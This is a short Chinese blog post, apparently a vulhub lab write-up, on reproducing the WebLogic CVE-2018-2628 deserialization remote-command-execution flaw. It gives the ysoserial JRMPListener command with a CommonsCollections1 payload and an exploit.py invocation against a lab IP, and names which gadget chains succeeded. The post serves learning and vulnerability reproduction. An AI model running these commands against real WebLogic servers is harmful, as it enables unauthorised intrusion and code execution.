【vulhub】Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

简单来说就是先用序列化工具ysoserial启动一个JRMP服务,加载先相关漏洞利用链,加载你要执行的恶意代码。

并将上述结果通过序列化工具ysoserial将我们的恶意代码进行一个序列化操作。

第二步就是将我们的exp去加载ysoserial序列化后的数据,后去打有漏洞的服务。

这个有反序列化漏洞的服务,会去反序列化后,执行我们的恶意代码。

关于cve-2018-2628 楼主测试到这4条cc链都可以打成功cc1 cc6 cc7 cc9

第一步,起一个JRMP服务

bash 复制代码
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'touch /tmp/akemi'

第二步,漏洞的相关exp去加载JRMP相关的一个序列化恶意代码

bash 复制代码
python exploit.py 192.168.100.34 7001 ysoserial.jar 192.168.100.34 1099 JRMPClient

参考链接

Vulnhub-Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
weblogic-JAVA反序列化(CVE-2018-2628)
Weblogic CVE-2020-2551漏洞复现&CS实战利用
从0学习WebLogic CVE-2020-2551漏洞
CVE-2018-2628漏洞复现(基于vulhub非常详细!)
runtime函数问题编码
vulhub镜像问题拉取问题

基于ysoserial的深度利用研究(命令回显与内存马)

Beacon Tower Lab记一次反序列化漏洞的利用之路

相关推荐
wanghowie4 分钟前
01.04 Java基础篇|泛型、注解与反射实战
java·开发语言·windows
深圳佛手8 分钟前
Java大对象(如 List、Map)如何复用?错误的方法是?正确的方法是?
java·jvm·windows
言之。12 分钟前
Claude Code Skills 实用使用手册
java·开发语言
苹果醋312 分钟前
JAVA设计模式之策略模式
java·运维·spring boot·mysql·nginx
千寻技术帮16 分钟前
10370_基于Springboot的校园志愿者管理系统
java·spring boot·后端·毕业设计
Rinai_R16 分钟前
关于 Go 的内存管理这档事
java·开发语言·golang
聆风吟º18 分钟前
【Spring Boot 报错已解决】彻底解决 “Main method not found in class com.xxx.Application” 报错
java·spring boot·后端
木易 士心20 分钟前
数字身份的通行证:深入解析单点登录(SSO)的架构与艺术
java·大数据·架构
ALex_zry36 分钟前
现代C++如何解决传统内存分配器的核心痛点
java·c++·spring
Coder_Boy_38 分钟前
【人工智能应用技术】-基础实战-小程序应用(基于springAI+百度语音技术)智能语音控制-Java部分核心逻辑
java·开发语言·人工智能·单片机